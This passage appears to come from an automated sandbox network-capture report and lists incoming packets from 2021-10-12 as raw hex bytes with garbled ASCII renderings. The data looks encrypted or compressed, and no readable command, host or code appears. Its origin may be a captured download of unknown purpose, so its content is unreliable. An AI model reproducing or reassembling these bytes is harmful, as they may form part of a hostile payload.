79 2c da 5d 34 6d fc 52 30 33 a3 cc ca a9 d6 46 88 15 5e f1 fb e9 0b 0d 2b df a6 52 58 17 b5 34 57 00 1f 6b 80 ed 2f 54 e0 3f f0 12 1c b7 5e b6 87 59 cb fd 0b ae e0 15 f1 48 fe 66 85 26 ee 05 e1 30 a1 44 2b a2 Data Ascii: A4\|R/a7[7dZ0r`=X6k(xHxF8U:+@,_RxH?}x,\"D7>%)TU_xCkuz}1N*G!,P&.6y,]4mR03F^+RX4Wk/T?^YHf&0D+
2021-10-12 14:35:51 UTC	140	IN	Data Raw: ff c6 44 16 37 7d d3 27 9e 7e 21 06 cd 0d 3d cb ba 38 39 d0 7a fa b1 1b ac 6d 25 99 60 2d 90 53 fe f6 c9 0c a5 97 69 6d c2 f6 49 de 1a 5f d3 c9 33 d3 38 d6 76 73 e4 14 c5 09 02 51 b6 80 80 37 74 cd f8 ba bf bc de 2e ce f3 54 b2 4d 39 01 85 b6 8b 05 18 e9 3e 80 11 02 2e 1f 58 d4 d2 ea c7 f9 05 92 69 29 64 cd 8b e4 b2 4a 1d 27 00 d6 bc 8e d8 75 8c e6 83 0c 80 0a 33 8e 24 4e 2b fd 95 30 95 4e 3d 8c a7 84 36 a9 8d d5 02 de 9d de 71 db 2e 9c d1 c5 52 e1 45 39 93 52 69 95 68 ec 2b 96 2d f9 9b 4a 14 b6 3f f6 e4 9b d8 01 bc 66 e0 fa ed 19 a5 dd 85 df 45 d8 ce a0 c1 33 3f 86 74 dc 2e c2 ad 15 f4 5b ba 58 bc de 45 49 c5 ba 9e 44 98 17 24 ed e9 c0 92 77 5b 85 c4 70 2b df 40 3e 6b 83 ac 28 29 4e 5a f8 d5 29 70 4f 32 af 71 26 a3 7a a7 23 e1 77 26 9d 6a 30 40 b0 1c 71 Data Ascii: D7}'~!=89zm%`-SimI_38vsQ7t.TM9>.Xi)dJ'u3$N+0N=6q.RE9Rih+-J?fE3?t.[XEID$w[p+@>k()NZ)pO2q&z#w&j0@q
2021-10-12 14:35:51 UTC	141	IN	Data Raw: 57 9b 93 67 e4 09 dd 77 9a a0 7c 7d 54 28 57 55 36 aa e6 ff 9b 2d 24 39 3c c5 db a2 87 18 cf ce 00 e8 1d a7 fe d1 f1 5a 97 ae 39 4c eb ff e0 5e da 50 63 3d 8a 12 8e 92 b7 ea ba 78 19 7a 3a e0 7c 65 ca a7 73 d2 20 de f3 1e 16 bd a4 94 fb 24 42 59 e7 0f f6 04 a1 56 6a e5 92 73 e6 17 d4 eb e6 05 86 da 3a 14 2e 4e 28 a2 5c 35 1d 98 52 4f 74 d0 80 56 e5 16 91 20 5b fd 65 2d 30 78 52 83 24 0c c5 d7 8c df 64 4b 14 86 dd be 16 0e 01 5a 7e e7 11 ab 5c 98 15 f5 8c ef 93 fb 83 d4 7b 4e 72 36 29 cf 5b 77 0c 11 24 2d 80 8c 1e 6f ab f1 a7 54 b3 5b 2e 78 07 fc b4 2e 95 3a 13 2e f1 2f d7 45 10 4d 47 73 22 2e 83 bc cc a2 fe 76 a2 38 5a db 7b bd 14 72 b2 da 86 5c 7a ab b4 ae 72 b7 28 60 b2 c1 0d e8 e1 1f ed 2f 6b ae 41 ba b0 6c e1 d0 0f 84 60 41 ea 37 67 63 a5 29 cc b8 e0 Data Ascii: Wgw\|}T(WU6-$9<Z9L^Pc=xz:\|es $BYVjs:.N(\5ROtV [e-0xR$dKZ~\{Nr6)[w$-oT[.x.:./EMGs".v8Z{r\zr(`/kAl`A7gc)
2021-10-12 14:35:51 UTC	143	IN	Data Raw: 95 02 1a 3a 07 27 ce 6c 3b 2a 25 fd 20 1e 00 be 2d 4b 77 84 17 bb 3c 19 61 5d d7 a0 a7 a9 9d 36 bf 40 26 b2 48 fe d6 e1 04 88 95 76 33 c0 5d 35 47 1d 75 55 97 74 d3 38 d2 cc 7a cb 06 e3 b3 f9 7d a7 a6 80 39 6d cd f8 85 3c b4 f3 2c d5 dd 53 36 33 a6 2a 03 cc 32 db 19 ed 1e 37 36 2f 3c a3 5d 26 c1 cc e7 f4 2a 89 69 09 f6 fd a3 c9 af 47 33 20 84 a8 23 a5 5e 0f 35 07 82 08 a0 be 14 a3 36 f2 2e 30 86 16 b5 40 02 97 a7 a4 b3 aa a5 f8 1f d3 b3 d9 f1 a5 b1 b7 57 bf eb 01 44 3d b3 e7 4e b8 79 50 2e 5a 3e df bb 45 76 ad 3f d6 5a 93 f5 03 a3 6d e2 55 91 80 a2 f7 07 81 3e d8 ce a4 7b 26 10 97 52 66 e9 ee bf 33 f4 08 a3 58 bc e3 d9 44 c7 ba 87 63 36 44 bf ec ef ee 34 ea c3 84 c4 ee 2e c3 50 18 4b fa 88 05 3b 48 10 d2 d7 29 6f 7a db a2 73 26 ba 5b 09 70 7a 76 20 b3 c8 Data Ascii: :'l;% -Kw<a]6@&Hv3]5GuUt8z}9m<,S63276/<]&*iG3 #^56.0@WD=NyP.Z>Ev?ZmU>{&Rf3XDc6D4.PK;H)ozs&[pzv
2021-10-12 14:35:51 UTC	144	IN	Data Raw: 23 14 d8 b2 7e 71 a7 ea 48 e6 09 fb ac 3e de e5 63 5f 04 5a 53 34 ac cc e3 c0 99 37 1f 18 e1 8b a0 87 38 8d f7 2d fa 24 8c 84 fe f3 5a b1 78 99 32 72 e1 fa 72 d7 57 61 3b a0 0e d5 26 a7 cc 9e 5d 48 78 3a c0 05 5c e7 b5 4e da 5e de f3 18 1c 2d f9 0d fa 3b 5e 51 cc 0f f6 02 11 f5 39 6e b5 53 e4 35 80 e9 c6 ed 00 ff 17 19 04 46 51 a2 5c 33 17 30 0f d6 75 cf 90 5e cf 16 91 26 eb 5a 36 a6 17 58 51 a1 71 0e e5 23 0a fa 49 45 24 8e a5 be 16 08 0b 9a 23 7e 10 b5 70 95 1f f7 8a c5 8f a0 37 c4 5d 6a 5a 62 2b cf 7b e7 34 3c 36 15 88 f7 1e 6f ad fb 6b 09 2a 5a 31 64 0f d8 b4 2e 93 8a b0 7d 7a 08 f7 48 32 1a 45 53 30 a9 a6 91 c1 8f f6 0c a2 38 5c d1 9f e0 8d 73 ad ce 8e 7b 7a ab b2 1e d1 e4 a3 47 92 cf 2f b0 e3 3f f0 a8 4e 83 4c 90 b8 19 e1 d0 09 8e 94 1c 73 36 78 7f Data Ascii: #~qH>c_ZS478-$Zx2rrWa;&]Hx:\N^-;^Q9nS5FQ\30u^&Z6XQq#IE$#~p7]jZb+{4<6ok*Z1d.}zH2ES08\s{zG/?NLs6x
2021-10-12 14:35:51 UTC	145	IN	Data Raw: 0d 38 82 c2 8f bb 20 62 38 27 ff 4b 49 16 27 5b f5 75 1e 00 b8 27 f9 2c 1d 16 a4 19 11 67 5d d7 a6 17 0a ce bd 98 60 09 90 31 fc f6 d1 be ad b8 7b 4d c8 09 35 47 1b 7f 82 cc ed d2 27 df c4 7b cb 06 e5 03 5a 2e 2f 81 a0 11 4f b7 fa a5 b4 0e d6 01 dc d3 5e 4e 31 a0 00 a5 ec 8e da 19 f6 1f 32 19 2d 3c 3f 52 8d ad 73 c6 d9 2c a9 12 2b 7b dd 39 ec 9d 58 3d 2d fd aa 25 8f f8 0e 89 06 82 13 a8 b8 3b a1 36 6e 21 9f ea a9 94 6e 04 b7 db 86 29 8a 3f dd 2d cf bd d4 8f a7 b7 9d f1 66 57 00 44 2e bb e5 4e b8 7f e0 89 09 b5 f8 9b 6e 54 d0 3d f6 fd 29 d0 2e ad 46 ea 05 91 80 a4 fd 29 da a7 d9 d9 88 76 14 12 91 78 7a b2 5a ac 15 d0 18 df 5a bc c3 f7 41 ea a8 be 4e 60 6b bd ec c9 6d 97 94 5a 9a cb c2 23 f0 52 1e 61 e6 d3 b1 28 6e 34 c3 aa 2b 6f 5a 80 a7 5e 34 83 70 5e 5f Data Ascii: 8 b8'KI'[u',g]`1{M5G'{Z./O^N12-<?Rs,+{9X=-%;6n!n)?-fWD.NnT=).F)vxzZZAN`kmZ#Ra(n4+oZ^4p^_
2021-10-12 14:35:51 UTC	146	IN	Data Raw: 4f 36 61 2b 49 af 0f e2 78 f7 0f 4b 07 2f 9c 0c c2 e9 a1 23 de be 8b c9 5e a2 82 a2 6e 5d d9 88 ed 0b 5b c6 3e e4 a5 2b f4 73 2e d7 cd db 3c 04 c7 67 38 bc ae 9b c9 76 f6 3a c5 ee 90 55 f3 a6 1b 55 3f 71 87 85 a0 04 67 f5 3d 91 b6 a0 95 c8 a8 90 f6 ae b1 87 1d cb 57 9a 7f c1 46 a3 e4 fd f6 56 da 90 c4 9c 90 b2 c2 89 e5 83 24 3b 86 1f 64 5e 99 73 6a 38 2f be f1 a3 5c 9d a1 8f 1c f7 27 f6 6a a6 62 9d 3c 8b 40 31 41 f1 26 01 1a 3e 07 6d d3 6c 3b af 58 f8 1c 3a 20 2a 05 cd 09 3d a5 9d 38 39 52 77 fa a2 3d 8a 9a a6 e7 f9 0c b0 4c de 65 d3 24 88 0f 4c 46 f9 56 17 d4 19 5f d7 c9 58 f4 38 d6 fb 7e e4 04 e3 2f f6 d2 c8 19 a1 15 6b ed 6c a7 b4 94 69 09 e3 e4 58 14 a7 a2 00 85 92 1d fc 19 e9 26 32 19 2d 3c 3f 52 89 ad 73 c6 d9 2c a9 fc 2b 7b dd 39 ec 9d 5b 3d 2d 13 Data Ascii: O6a+IxK/#^n][>+s.<g8v:UU?qg=WFV$;d^sj8/\'jb<@1A&>ml;X: *=89Rw=Le$LFV_X8~/kliX&2-<?Rs,+{9[=-
2021-10-12 14:35:51 UTC	147	IN	Data Raw: 53 a7 e8 1e 93 a3 39 4e 28 6c 4a 9a 8e 07 28 a5 43 1e d1 37 a8 26 43 2a 72 67 d0 7f 8a fe e8 7c 7f 12 6f dc 61 fe 3d f8 f5 79 f7 d5 f7 d4 4c 61 71 c1 ae b5 3c fe c9 bf 64 65 c4 da 0e 7c 7b a0 7a 71 5d 1f a9 15 7f d8 86 61 57 7e 20 f9 f9 4d c8 0c c7 7d 6c e9 71 30 65 44 63 48 81 3b 7b d3 75 3f a6 a2 52 c5 79 ef ca 3f ee 79 0a 4e 98 4f 06 ec d4 62 be 23 bc 74 6e f1 d7 e3 0b 2f 29 2d 73 6c e5 fd 5a 4a 02 db 60 26 2a d5 21 8e fd 05 49 7a 95 9d 6a 5f 0b db 5d 3c 2d c2 7c 54 33 7b 79 19 a8 e6 63 94 86 48 86 1d c1 dd 82 3d 3a 17 d2 9a cd 2f be f0 dc 49 58 91 84 9b cd 55 fe e0 45 f3 7d 4c 3f 8a 8e 81 39 d8 55 9b 7d 1f 5a 81 c2 9f 79 50 82 45 e8 2b fc 48 1a 3c 3b fa 05 d2 24 46 66 ee 25 db 06 3b 75 6d 71 ca ca e1 15 d0 cb 7a ef 9a da a0 2e 0f 74 23 80 e0 31 37 1e Data Ascii: S9N(lJ(C7&Crg\|oa=yLaq<de\|{zq]aW~ M}lq0eDcH;{u?Ry?yNOb#tn/)-slZJ`&!Izj_]<-\|T3{ycH=:/IXUE}L?9U}ZyPE+H<;$Ff%;umqz.t#17
2021-10-12 14:35:51 UTC	148	IN	Data Raw: 7f 99 7f ac 23 62 32 4b ab 1d b0 70 7b 7d d7 d7 69 89 2d 06 29 75 de aa 11 24 9c 05 cb 7e bd 89 38 48 42 fd bf d5 21 76 c2 14 64 f1 30 8b ea 2b f7 14 f9 b3 06 5d 42 8f 8b a5 aa 32 54 79 38 e5 ad 9b fa d5 b9 12 6a 3a 5e 85 83 8c a8 9b 12 a5 90 b2 84 6b 5a aa 90 6c 11 b9 b8 2a cd a9 08 7d c1 66 cf 7f db f6 49 c9 90 c4 9c 90 b2 c2 8d e5 83 24 3b 86 1f 2a 5e 99 73 6a 38 2f bd f1 a3 12 9d a1 8f 1c 12 2a f6 6a ae 45 98 13 89 46 1d e9 09 c1 99 1b 3a 23 df 31 6e 3b 35 e7 f0 20 0e 26 98 e7 cf 09 1d 36 dd 13 39 4a 40 db 88 10 8e b0 22 b3 e6 73 29 49 fe f2 f1 c5 8a 95 69 f1 cd 5d 25 61 3b be d5 e9 ed f2 4a fd ec 56 d6 22 cb 04 de 50 b0 aa 22 6b f6 cc f8 a1 94 76 f1 2c ce 6f 5b 19 22 86 20 67 b0 ab da 39 7f 15 1a 34 37 14 14 7a 0b d5 c0 45 a7 b1 88 69 2d 5b 3e a1 c9 Data Ascii: #b2Kp{}i-)u$~8HB!vd0+]B2Ty8j:^kZl}fI$;^sj8/*jEF:#1n;5 &69J@"s)Ii]%a;JV"P"kv,o[" g947zEi-[>
2021-10-12 14:35:51 UTC	150	IN	Data Raw: 07 48 48 10 86 2d 3e f7 36 ba 81 8c 4a 02 ea ae 26 a2 16 0a a5 f5 1f d1 37 12 df 49 38 54 5e fb 51 88 fe ce 49 d0 6c f6 c2 70 d2 30 4c f7 7f dd c9 ac 60 5c 47 55 57 a8 b6 3c de 8c bd 49 77 fb d2 27 7d 7b a6 70 c7 0e 86 a8 0a 6a d0 1c 61 57 78 90 5a aa c6 ef 2c 74 5f 69 ea 51 d2 d8 61 4e 45 ae 33 53 d2 75 39 ac 61 01 5c 78 f0 c1 37 7b 79 0a 48 28 ec 55 64 f3 42 02 01 ba 77 4e 1a 6a c6 26 23 27 20 77 6f e3 d7 fc 64 b6 da 60 3d 05 44 0e 8c fd 99 46 d5 f9 22 4b e6 0d fb 5a 1f de e5 e6 71 01 66 77 14 ad e5 65 be 20 69 32 1c c1 c7 8a aa 3a 17 d4 2a 6a 7c 35 d7 fc f7 7a 99 87 bb 32 e8 db cd 4b dc 75 69 3e 8a 88 8b d8 8b cc 9a 61 33 57 38 c0 99 53 4c d9 f1 fb 0d d8 d3 11 3f 3b da 97 df 09 54 5f c1 04 f5 04 3b 53 2a da b4 53 ff 27 fc c6 c4 ed 9c f0 bc 75 bb 67 05 Data Ascii: HH->6J&7I8T^QIlp0L`\GUW<Iw'}{pjaWxZ,t_iQaNE3Su9a\x7{yH(UdBwNj&#' wod`=DF"KZqfwe i2:j\|5z2Kui>a3W8SL?;T_;SS'ug
2021-10-12 14:35:51 UTC	151	IN	Data Raw: 1c 14 88 3d eb ac 18 dd 48 b7 eb 8c f6 bb f6 bf e8 e7 fb 74 97 f3 1c bb 1c 90 fd 69 6b 82 5f 21 9a 45 cf 22 3d d7 e4 ea 78 35 71 9b dc 78 85 53 20 1c 37 4d 96 6b 7e 4b 02 fc 87 3c ef d7 82 c9 ac 1c 75 6f 88 bf dd 91 ba cf 7e 57 47 11 d6 d6 a6 7b a3 d5 f8 9f bc bc e9 19 cd f7 c0 71 f5 c2 74 85 0d 7d 52 a8 34 e9 3c 85 b1 19 b3 cc 92 bb ac e4 b7 37 ef 6f 1c 55 ef 53 e6 17 b9 52 a4 1f 03 f8 c6 93 f8 8d a2 9a 78 6e 1a e0 77 f2 14 8c 2d 9b 44 1d c7 9b bb 57 20 2e 00 d1 a3 05 3a 29 77 ed 23 33 0e 98 2c ef 77 78 0f b0 35 5a 34 52 ca b0 55 ff a9 25 ef 76 3d 81 90 30 2d 0b b0 07 77 a1 be 6b f0 c4 84 df 94 04 36 24 0f e5 49 06 99 11 c6 70 d7 0c 8b 64 0e 35 d0 b7 03 04 47 57 56 1f c3 28 00 91 db da 57 f1 7e 45 5f 10 e8 10 d6 f0 c7 ce c9 f4 a3 f5 24 0d 42 41 af 06 f3 Data Ascii: =Htik_!E"=x5qxS 7Mk~K<uo~WG{qt}R4<7oUSRxnw-DW .:)w#3,wx5Z4RU%v=0-wk6$Ipd5GWV(W~E_$BA
2021-10-12 14:35:51 UTC	152	IN	Data Raw: f6 2f fd f9 44 9a d6 f0 aa 14 8a be 66 8d 14 02 1c d9 a1 de 7c 03 0e 99 bd 2a 50 9a 72 83 2c 7d e7 bc 37 27 b5 3d f2 81 b5 1e bd 3f b7 92 22 b1 15 49 be 2f bb 06 8a b2 11 2f 31 08 a6 a4 2a c9 02 8d 4e 3b a6 9e 5f 1f 16 c6 37 ce 03 d7 cf 61 0c 8a 44 0a 2b 5d 84 82 b8 32 90 56 03 0f 0e 97 2a a9 12 0f 5e 6c aa 46 6f cf 72 28 82 20 27 5e 26 da d5 17 5d 75 1b 43 1a 2d 18 fe f2 5f 19 35 a9 75 6d 3e d6 90 15 29 12 4d 5e 4e d1 f1 fb 01 b6 fb 5b 0a 33 5b 09 be d2 82 4a 67 b4 83 72 d7 3c eb 84 99 15 23 bf af e3 b9 b1 e7 79 76 f7 2b 93 ff ca c0 14 01 75 54 aa de 03 d0 31 dd 7c 00 2d 35 fe 79 63 5f d7 98 04 04 b6 15 ba 87 89 38 4c 49 48 5c 3d 6f cd e7 89 ca 3b 61 88 3c 54 d0 04 e8 51 22 aa ba bb 50 cf 5e a2 c0 f7 74 82 77 89 bb fb e0 7b 20 dd 58 c7 5d 74 45 38 1e 5e Data Ascii: /Df\|Pr,}7'=?"I//1N;_7aD+]2V*^lFor( '^&]uC-_5um>)M^N[3[Jgr<#yv+uT1\|-5yc_8LIH\=o;a<TQ"P^tw{ X]tE8^
2021-10-12 14:35:51 UTC	153	IN	Data Raw: b5 ca 98 47 10 31 75 a1 04 d9 24 cc 5f cb 60 21 77 3e 32 62 2a 60 6d 3c b2 18 67 90 2b de 74 51 8d 8d 2c ad c1 5a 89 57 aa f1 5d 2d 21 f0 fa 98 43 14 b4 00 c0 ad 9f bd 8c 4b fb e4 c1 94 63 9e 4c c2 b7 bf fc 91 2e 1a 12 ec e2 b4 fc c8 e8 17 41 16 51 94 d8 e5 6b b2 df a3 8b fb ea ee 18 ae aa b3 3b db f5 1b f4 6e 0a 36 b7 6b a4 73 e1 99 79 e0 96 c5 ac ec d0 8c 7f ee 22 1f 55 ed 43 94 7b 82 18 de 71 7c 9f ef b9 ec 0b 36 41 fa 85 da 7a a4 7c 85 7f ed 10 c3 9c 56 05 66 d9 95 b2 ba 7d 17 98 b9 b5 b1 5f 95 ce da 5c f8 7b bc f5 f6 59 c1 9b aa b0 3a 49 c8 35 17 9d 32 c8 f6 4f e1 54 49 7d cc 5e 35 ce 81 40 ca bb c3 9d c2 07 3a 67 50 b4 41 2c d4 40 8d 68 be 1b 89 6d 49 6e 88 f2 06 3c 74 7a 1e 43 ea 08 7d 88 d0 9d 06 a0 3e 40 05 77 b4 5d 8d b3 9f d7 9f 8c cd a7 2a 57 Data Ascii: G1u$_`!w>2b`m<g+tQ,ZW]-!CKcL.AQk;n6ksy"UC{q\|6Az\|Vf}_\{Y:I52OTI}^5@:gPA,@hmIn<tzC}>@w]W
2021-10-12 14:35:51 UTC	155	IN	Data Raw: 9f aa 7f 58 e1 35 f5 0e 0e 93 6a 10 3d 4f bf 20 28 f4 3a b6 b4 ac 60 7b 24 b8 db c1 63 63 f7 ad 54 bb 4a fa 8c 5d 70 0c 16 84 1c d7 81 98 29 84 58 a7 d6 7e f3 28 67 f7 7a fd 41 d4 c5 7f 49 44 7c a4 aa 1b f3 1c 83 69 39 e4 e1 24 6f 56 bc 48 e4 3f a2 90 10 53 dc 11 5d 57 55 97 f3 e7 2b ef 59 74 13 02 81 3c a1 2d 2e 0a 34 f6 77 33 c4 64 40 e1 c8 c5 c1 fc 72 57 82 c9 9d 91 d8 96 8a be 1c 62 af d4 f7 61 a5 86 d5 6d 02 dd e2 c5 c4 a3 f8 18 32 23 d9 21 17 ac ea b2 da 99 37 51 21 dc 92 3a 0c e5 3c a1 75 ef c1 71 46 da e9 8b d1 fe 98 07 34 ca 12 da 9a c5 c5 7b 52 2f 03 b6 86 46 c4 5a 9d 35 0e 55 6c d6 1e 0e 26 b3 e6 2f 55 df 6b c4 ce 98 36 28 04 1c 5b 34 6c fb e9 88 b8 37 76 ff 26 48 84 0e e7 46 19 83 c3 d0 49 99 1a de a7 9c fd 1f ec 1a 27 1a 52 e3 af 36 97 5d 9c Data Ascii: X5j=O (:`{$ccTJ]p)X~(gzAID\|i9$oVH?S]WU+Yt<-.4w3d@rWbam2#!7Q!:<uqF4{R/FZ5Ul&/Uk6([4l7v&HFI'R6]
2021-10-12 14:35:51 UTC	156	IN	Data Raw: 29 18 c2 1f b6 20 5f 59 8b fb fc e9 34 c6 11 1a b2 62 c8 73 5f 5f 47 17 4e 60 34 4c 3f c3 4e 2d a7 21 9d 04 5d c3 8e 6b b4 a0 3e 9d 5c eb f1 7e 68 0f f7 ca a5 0f 2b 9a 16 e4 a0 96 b6 ca 0f ff f6 98 98 2b ee 7a a7 b2 a6 b8 c6 20 4c 00 f2 dd b0 c4 eb 94 3c 60 33 68 a1 b1 7f f6 26 47 73 0f 77 68 64 8f 6f 43 0f e3 51 7c c5 26 a7 c1 a2 0d 9f 61 95 09 2a 93 49 27 73 00 33 52 01 f1 61 f0 db e9 70 dd 06 ae 6f 9c 06 f9 eb 51 10 6a 31 6b 59 74 9c 89 e3 08 89 48 ba 56 e9 48 80 d9 04 15 20 88 a7 b4 a6 6d 43 ee ad 8f f7 4f 86 96 8e 2f 89 51 88 8b db 62 e0 e5 97 f6 7c 08 96 2a 0b 85 21 df ac 00 e5 4b 40 49 93 28 3d c4 d6 43 cf 8c ff b4 e8 77 4a 5d 67 8c 6d 4c 12 96 72 ba 66 80 0f ec cd f1 51 3d 9f b0 f3 f4 dc ab 6f df e5 6b 21 22 ba 1d 9f aa e0 c5 03 f6 1d 52 50 47 45 Data Ascii: ) _Y4bs__GN`4L?N-!]k>\~h++z L<`3h&GswhdoCQ\|&aI's3RapoQj1kYtHVH mCO/Qb\|!K@I(=CwJ]gmLrfQ=ok!"RPGE
2021-10-12 14:35:51 UTC	157	IN	Data Raw: b8 98 79 20 c3 99 ea 18 3f ab 76 aa 51 70 f8 30 70 4e 11 b9 30 29 e3 41 d9 d0 ce 63 1e 7c d0 a7 a5 0a 30 ab cd 09 ce 0d ad d4 4d 49 71 50 d0 7b a9 d8 c0 51 f9 66 c5 e3 4f d3 09 49 f7 74 e2 74 ef c9 99 98 d9 ec 2c 2a cc 35 d5 4d ab b6 12 21 e2 a8 9d 4c 9d 27 fe 52 34 eb a6 25 ef b7 82 bd 52 43 70 ac 0b c9 c2 a0 81 17 a0 26 ad b7 81 ee 30 b9 9c 2b 9e d3 65 d0 c2 a5 d4 40 10 ef ad 89 a0 e7 c7 cf a2 79 79 93 b9 a1 3f e5 da bd 42 54 8e a4 8b 9f e8 e1 7c 74 69 b9 1a 5e f9 a7 9f f3 8b 2c 64 0b e2 ca 19 28 d5 42 bf 7d ee 81 6f 51 e7 f7 82 dc a7 84 1a 50 f1 2c 81 b1 9a 84 53 5e 21 16 45 6f a5 6f 92 7d d0 ac 9a ed 31 d5 db d1 79 33 a1 92 34 93 0a 3a 65 de d4 ff cc e5 9f cc 3d 4b 34 54 ab e4 0e b5 df 0a 8a 52 bf 94 6a 4b 63 99 63 91 50 36 14 8a 3f 9f 6e 5c 58 05 84 Data Ascii: y ?vQp0pN0)Ac\|0MIqP{QfOItt,*5M!L'R4%RCp&0+e@yy?BT\|ti^,d(B}oQP,S^!Eoo}1y34:e=K4TRjKccP6?n\X
2021-10-12 14:35:51 UTC	159	IN	Data Raw: 1c f9 e4 b8 b3 71 55 9c 4e ef 4a 20 21 e0 bc 88 be 61 80 57 41 a0 74 9a 24 42 1c 55 13 55 0f 72 61 4b dd 35 5a b1 17 9b 2a 68 10 4e fc 26 75 d2 02 90 75 75 f9 8b 97 1b 7b 16 dc 94 23 c4 09 62 47 72 16 c8 38 2d 1e 41 e0 2e be 46 77 7e 73 01 a8 91 e6 07 0b 43 13 34 4d e6 84 ca ab 64 76 58 db 14 45 61 33 09 03 64 a3 47 17 7c b5 11 14 82 75 f2 b4 cd 55 c8 17 d2 58 76 f0 65 2d 71 09 03 14 49 af 01 98 a0 b8 14 a7 53 e2 3d c9 5c 8f 9d 11 75 26 7c 3e 0d 69 bd e8 a8 49 c2 35 d5 01 99 3a fa a0 7c 03 03 b7 a4 82 ae 89 ac 2d 60 6f 27 98 4c 6d 57 f7 54 8e 72 69 41 ee 64 73 12 0c c8 da 69 d2 e6 67 88 7e 42 bc 4b dd a1 9f 42 fe f7 04 0f 86 2f 5a 27 74 34 8f b0 b6 aa 43 a0 87 27 a1 68 ad 7b af 22 cf e2 da 74 2b d4 f5 af ea a7 de 22 cf f9 6b 3b 21 e9 17 94 af 82 c7 01 f3 Data Ascii: qUNJ !aWAt$BUUraK5Z*hN&uuu{#bGr8-A.Fw~sC4MdvXEa3dG\|uUXve-qIS=\u&\|>iI5:\|-`o'LmWTriAdsig~BKB/Z't4C'h{"t+"k;!
2021-10-12 14:35:51 UTC	160	IN	Data Raw: 1c 16 5a 95 46 eb c2 46 10 f4 b8 ca 27 35 9c 56 8e 4c 9c 02 cc 8e b3 c6 73 ae f6 39 d1 58 0b 01 ca f8 a5 0e 75 74 c9 dc 5c 69 94 40 af 17 66 ec b7 e5 da 59 f8 71 11 12 a9 07 81 07 39 c2 46 b8 e2 5c c9 53 fe 69 37 b0 b2 ba 84 4b 40 8d 01 ef 78 94 fd 58 7f be b0 d5 29 de 70 b3 15 75 92 ee 6e b5 e0 92 ba 27 4b 48 d7 2d e2 f0 fb ef 76 c8 41 89 b2 87 ec 35 af f0 73 df c5 73 84 8c ee de 15 37 ea e9 c2 a7 f1 e3 e5 97 49 40 e0 be d7 29 d2 f4 47 a8 ae 50 3f 03 4f 33 20 b6 92 8f 66 9c 86 28 74 00 74 37 c3 e2 8e 3e 45 96 d7 1d b9 46 8a 0c 49 be 88 0c 39 4b 1a 35 58 87 9e 09 d4 25 12 5b 37 ea 83 8a a8 64 3a fd 56 ca 21 f8 f1 df a1 7e ce ae 91 18 58 d4 ca 1f dd 58 65 2f bb 86 bb b2 f5 fe 8c 60 00 7d 09 db b8 44 f3 87 4b c8 0d c8 db 3f 11 21 fb 24 c2 1e 65 48 c4 10 f4 Data Ascii: ZFF'5VLs9Xut\i@fYq9F\Si7K@xX)pun'KH-vA5ss7I@)GP?O3 f(tt7>EFI9K5X%[7d:V!~XXe/`}DK?!$eH
2021-10-12 14:35:51 UTC	161	IN	Data Raw: 48 af 7a 0e 75 f6 34 22 7f 5a 89 bf 71 b2 1f a7 e5 f2 08 79 40 5e 99 72 a4 b1 28 ee 6f 90 df 8e 88 8d 83 c8 c7 cc d2 44 e9 8b 2a 9b 3c ad a0 30 3d 9d 08 69 a2 6f ad 02 03 9a 91 83 05 29 7f a2 d7 4e b1 75 1c 72 25 63 b8 46 52 6e 28 9a 4a d7 38 33 18 17 2c 95 d0 8d 50 68 1f 73 72 0e a7 e9 88 f4 35 2f 07 83 6d 39 0d 37 09 0d 59 e5 4c 2b 18 dc 75 1a f1 0d 99 ee cd 39 58 98 1a 97 f5 41 88 a1 af 90 87 ac f8 48 8f 0d 2c 62 8d 34 fe 52 dd 7c f2 1e 02 a8 d0 81 cf 9b e9 e1 46 27 6a 95 03 c8 68 f7 7c ba 70 2c f7 ba 95 2b 30 03 08 ce f5 44 09 0e 25 a5 68 63 38 8d 1b c3 13 07 11 bb 3a 74 1a 10 97 af 3a 9f bd 37 86 3b 17 b0 42 e4 a7 c3 24 9f 80 6a 34 ca 6a 29 63 3f 60 be c3 c3 ea 14 f6 ce 65 ed 60 c2 02 eb 67 8c ac aa 0e 61 c4 e0 b9 a4 81 82 01 e2 91 11 c6 aa 75 a0 62 Data Ascii: Hzu4"Zqy@^r(oD*<0=io)Nur%cFRn(J83,Phsr5/m97YL+u9XAH,b4R\|F'jh\|p,+0D%hc8:t:7;B$j4j)c?`e`gaub
2021-10-12 14:35:51 UTC	162	IN	Data Raw: 04 02 cb 09 b5 f0 56 3d 07 88 c9 88 3b 3f 01 f4 72 6e 23 91 64 c7 06 c1 b1 d6 e2 16 65 03 86 af a2 da e4 02 bd b5 d0 c3 f2 f7 66 73 cb b8 5e 05 f4 fb db 85 f7 a8 ff 36 2c da 7c 48 d1 ff 03 f2 08 ef d1 bc a4 ba df c2 6e 57 2e 61 2d ad 4e c2 8d 0d 06 3c 5e 8e 4d 2c 5c b7 bc 0d 3d b4 d5 5b 9b ca 19 44 ae 6d 63 aa 71 a4 e2 6e cf 21 00 d1 5e 4e 98 32 63 a0 f1 82 fc fc 29 80 61 04 5c 9e 19 7a a3 22 ca 49 8c 32 c8 1c 70 15 af 63 66 24 0c ec d7 19 cb 7a f7 ac 97 40 e2 d6 d2 16 ea 2d 38 d7 1a cc 2a 36 61 23 7b 28 72 27 26 01 aa 57 38 c1 71 db 7f 06 94 dd 6c aa e1 7c a2 23 c5 c2 5a 6e 2f bb e4 8a 52 1e b2 5f 88 e6 de e5 9d 54 ae a6 a7 c1 7b b3 25 f1 d3 c1 8b ef 57 79 38 c5 ee b0 f6 d5 a6 1b 34 23 72 b5 ab 95 1e d6 ba 9d 90 b6 a4 b5 5c aa f0 f6 34 94 06 8f ed 77 29 Data Ascii: V=;?rn#defs^6,\|HnW.a-N<^M,\=[Dmcqn!^N2c)a\z"I2pcf$z@-8*6a#{(r'&W8ql\|#Zn/R_T{%Wy84#r\4w)
